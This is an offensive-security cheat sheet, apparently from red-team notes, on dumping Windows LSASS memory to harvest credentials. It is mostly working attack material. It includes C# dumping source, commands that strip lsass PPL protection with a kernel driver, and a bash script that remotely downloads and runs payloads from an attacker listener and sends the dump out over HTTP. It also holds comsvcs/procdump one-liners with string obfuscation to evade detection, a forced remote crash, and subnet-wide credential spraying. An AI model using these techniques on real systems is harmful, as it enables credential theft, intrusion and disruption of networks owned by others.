Enumeration
Check if lsass.exe is ran as a protected process (PPL):
Copy PS > Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" A legit way to disable it via
Copy mountvol X: /s
copy C:\LSAPPLConfig.efi X:\EFI\Microsoft\Boot\LSAPPLConfig.efi /Y
bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\LSAPPLConfig.efi"
bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215}
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions %1
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X:
mountvol X: /d
shutdown -r -t 0 MiniDumpWriteDump
Parsers
Custom Implementations
MiniDump Callbacks
C# Implementation
Copy using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace SharpMiniDump
{
public class Program
{
[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
public static void Main(string[] args)
{
FileStream dumpFile = new FileStream(@"C:\Windows\tasks\lsass.dmp", FileMode.Create);
Process[] lsassProc = Process.GetProcessesByName("lsass");
int lsassPid = lsassProc[0].Id;
IntPtr hProcess = OpenProcess(
0x001F0FFF, // PROCESS_ALL_ACCESS
false,
lsassPid);
bool res = MiniDumpWriteDump(
hProcess,
lsassPid,
dumpFile.SafeFileHandle.DangerousGetHandle(),
2, // MiniDumpWithFullMemory
IntPtr.Zero,
IntPtr.Zero,
IntPtr.Zero);
}
}
} Reusing Open Handles
pypykatz
Copy Cmd > .\pypykatz.exe live lsa --method handledup SharpHandler
Scan if there are dupeable handles to use:
Copy PS > Invoke-SharpHandler -C "-s" Write a gzip-compressed minidump to specified location:
Copy PS > Invoke-SharpHandler -C "-w -c -l=C:\Windows\Temp\pony.dat" Dump and parse with SharpKatz's logonpasswords:
Copy PS > Invoke-SharpHandler -C "-d" HandleKatz
Copy $ x86_64-w64-mingw32-gcc -o loader.exe loader.cpp -lcrypt32
Cmd > .\loader.exe --pid:852 --outfile:C:\Windows\Temp\dump.obfuscated LetMeowIn
Silent Process Exit
Remove PPL Protection
Using Mimikatz driver:
Copy PS > sc.exe create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand
PS > sc.exe start mimidrv
PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exit"' Load SSP
SspirConnectRpc
MirrorDump
Copy Cmd > .\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
Cmd > .\MirrorDump.exe --parse
$ python3 MirrorDump.py 0.0.0.0 31337 --md5 --parse
Cmd > .\MirrorDump.exe --host 10.10.13.37 --port 31337 DuplicateDump
nanodump
Copy Cmd > .\load_ssp.x64.exe C:\Windows\Temp\nanodump_ssp.x64.dll
beacon> load_ssp
Copy #!/usr/bin/env bash
# Usage: sudo nanodump_ssp.sh <[DOMAIN\]USERNAME>:<PASSWORD> <TARGET> <LISTENER>
# Example: sudo nanodump_ssp.sh 'megacorp.local\snovvcrash:Passw0rd!' 192.168.1.11 10.10.13.37 80
CREDS=$1
RHOST=$2
LHOST=$3
LPORT=$4
CMD="IWR -Uri http://${LHOST}/a.exe -OutFile C:\Windows\Temp\a.exe;IWR -Uri http://${LHOST}/a.dll -OutFile C:\Windows\Temp\a.dll;C:\Windows\Temp\a.exe C:\Windows\Temp\a.dll"
CMD_BASE64=`echo -n ${CMD} | iconv -t UTF-16LE | base64 -w0`
python3 -m http.server ${LPORT} &
wmiexec.py -silentcommand -nooutput ${CREDS}@${RHOST} "powershell -enc ${CMD_BASE64}"
sleep 10
kill -9 `netstat -tulpan | grep ${LPORT} | grep python | awk '{ print $7 }' | awk -F/ '{ print $1 }'`
python3 put.py --bind=0.0.0.0 ${LPORT} &
CMD="IWR -Uri http://${LHOST}/out.bin -Method PUT -InFile C:\Windows\Temp\report.docx;rm C:\Windows\Temp\a.exe;rm C:\Windows\Temp\a.dll;rm C:\Windows\Temp\report.docx"
CMD_BASE64=`echo -n ${CMD} | iconv -t UTF-16LE | base64 -w0`
wmiexec.py -silentcommand -nooutput ${CREDS}@${RHOST} "powershell -enc ${CMD_BASE64}"
sleep 30
kill -9 `netstat -tulpan | grep ${LPORT} | grep python | awk '{ print $7 }' | awk -F/ '{ print $1 }'`
bash restore_signature.sh out.bin
pypykatz lsa minidump out.bin
chown ${SUDO_USER}:${SUDO_USER} out.bin Bypass Saving on Disk Detection
NTFS Transactions
TransactedSharpMiniDump
CredBandit
Dumpy
Kernel Mode
Abusing Gigabyte Driver
CVE-2018-19320
Physical Memory
Copy Cmd > vmss2core.exe -W/-W8 Snapshot.vmsn Snapshot.vmem Crash Dumps
Get current CrashControl settings and set CrashDumpEnabled to 0x01 (default dump location is C:\Windows\MEMORY.dmp):
Copy $ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
This action causes DOS! Do at your own risk.
Copy $ cme smb 192.168.1.1 -u snovvcrash -p 'Passw0rd!' -x '\\10.10.13.37\notmyfaultc64.exe -accepteula /crash 0x03' --no-output
Copy kd> .load C:\mimilib.dll
kd> .SymFix
kd> .Reload
kd> !process 0 0 lsass.exe
kd> .process /r /p fffffa80072b2b10
kd> !mimikatz
Copy $ pip install volatility3 pypykatz
$ git clone https://github.com/volatilityfoundation/volatility3 ~/tools/volatility3
$ git clone https://github.com/skelsec/pypykatz-volatility3 ~/tools/pypykatz-volatility3
$ cd ~/tools/volatility3
$ python3 vol.py -f /path/to/MEMORY.dmp -p ../pypykatz-volatility3 pypykatz Physmem2profit
Server:
Copy PS > .\Physmem2profit.exe --ip 192.168.1.11 --port 1337 --verbose [--hidden] Client:
Copy $ python3 physmem2profit --host 192.168.1.11 --port 1337 --install "C:/Windows/Temp/winpmem_x64.sys" --mode all --driver winpmem Credential Guard
Patch and Bypass
Patch the g_fParameter_UseLogonCredential and g_IsCredGuardEnabled variables by their hardcoded offsets within wdigest.dll loaded by LSASS:
Resolve g_fParameter_UseLogonCredential and g_IsCredGuardEnabled variable offsets dynamically at runtime:
Two PoCs above merged:
PassTheChallenge
CVE-2025-21299, CVE-2025-29809
Attacking vSphere
comsvcs.dll
Copy PS > $proc = 'ls'+'Ass'
PS > Get-Process $proc
PS > rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\System32\spool\drivers\color\pony.dat full Not touching the disk (using an SMB share):
Copy PS > net use z: \\10.10.13.37\share
PS > rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump (Get-Process ('ls'+'Ass')).id z:\pony.dat full One-liner:
Copy Cmd > %COMSPEC% /Q /c echo powershell.exe -NoP -C "%WINDIR%\System32\rundll32.exe %WINDIR%\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id %WINDIR%\Temp\pony.arj full;Wait-Process -Id (Get-Process rundll32).Id" 2^>^&1 > temp.bat & %COMSPEC% /Q /c temp.bat & del temp.bat ProcDump
Copy PS > wget http://live.sysinternals.com/PsExec64.exe -o psexec.exe
PS > .\procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp Process Argument Spoofing
Mimikatz
Copy PS > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "sekurlsa::logonpasswords full" "exit" Parse MiniDump:
Copy PS > .\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit" Grep for creds:
Copy $ grep -a '* Username : ' out.txt -A2 | grep -a -e Username -e Password -e NTLM | grep -a -v null | xclip -i -sel c kiwi
Copy meterpreter > getsystem
meterpreter > load kiwi
meterpreter > creds_msv
meterpreter > creds_wdigest
meterpreter > lsa_dump_secrets
meterpreter > creds_all
meterpreter > kiwi_cmd '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "exit"' pypykatz
Install:
Copy $ pipx install -f "git+https://github.com/skelsec/pypykatz.git"
$ pypykatz lsa minidump lsass.DMP [-k /tmp/krb] [-g/--grep] [-p msv wdigest kerberos] Parse with jq one-liner:
Copy pypykatz lsa minidump lsass.DMP --json |& tail -n +2 | jq '.[].logon_sessions[] | "\nTime : \(.logon_time)", "Server : \(.logon_server)", (.wdigest_creds[] | select(.password != null or .password_raw != "") | "WD : \(.domainname)\\\(.username):\(.password // .password_raw)"), (.msv_creds[] | "NT : \(.domainname)\\\(.username):\(.NThash // "N/A")"), (.kerberos_creds[] | select(.password != null or .password_raw != "") | "KRB : \(.domainname)\\\(.username):\(.password // .password_raw)")' -r | tail -n +2 | bat --paging=never --theme=ansi Pipe to the script to parse with colors:
Copy #!/usr/bin/python3
import re, sys
a = sys.stdin.read()
def pp(x): print(f'\033[1m[+] \033[93m{x}\033[0m')
s = set()
for m in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n.*\n\s+NT: (.*)', a):
u, d, h = m
if u and h: s.add(d + '\\' + f'{u}:{h}')
for i in s: pp(i)
s = set()
for m in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n\s+Password: (.*)', a):
u, d, p = m
if u and p: s.add(d + '\\' + f'{u}:{p}')
for i in s: pp(i)
s = set()
for m in re.findall(r'\s+username (.*)\n\s+domainname (.*)\n\s+password (.*)', a):
u, d, p = m
if u and p and p != 'None': s.add(d + '\\' + f'{u}:{p}')
for i in s: pp(i) spraykatz
Copy $ python3 spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39 Dumpert
Dump lsass.exe using direct syscalls and removing user-land API hooks:
Copy Cmd > rundll32.exe .\Outflank-Dumpert-DLL.dll,Dump Use a shellcode loader of your choice to dump LSASS.
lsassy
Copy $ lsassy 10.10.13.0/24 -d megacorp.local -u snovvcrash -p 'Passw0rd!'
$ cme smb 10.10.13.0/24 -u snovvcrash -p 'Passw0rd!' -M lsassy MalSeclogon
Copy Cmd > Malseclogon.exe -p <LSASS_PID> -d 1
Cmd > Malseclogon.exe -p <LSASS_PID> -d 2 